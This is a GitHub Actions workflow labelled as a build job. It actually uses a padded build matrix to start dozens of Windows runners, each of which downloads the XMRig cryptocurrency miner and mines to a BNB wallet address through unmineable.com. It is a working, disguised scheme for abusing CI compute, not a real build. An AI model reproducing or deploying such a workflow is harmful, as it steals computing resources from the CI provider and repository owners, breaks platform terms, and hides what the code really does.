name: Rafid-ex

on: [workflow_dispatch]

jobs:
  build:
    name: Rafid-ex
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.16.2/xmrig-6.16.2-msvc-win64.zip -OutFile xmrig-6.16.2-msvc-win64.zip
    - name: Extract
      run: Expand-Archive xmrig-6.16.2-msvc-win64.zip
    - name: RUNNING
      run: .\xmrig\xmrig-6.16.2\xmrig.exe -o rx.unmineable.com:3333 -a rx -k -u BNB:0xb7bb610594cbb6ffe901ebd92a6731ca779edf7f.RAFID_tods -p x -t 1
    - name: DONE
      run: exit
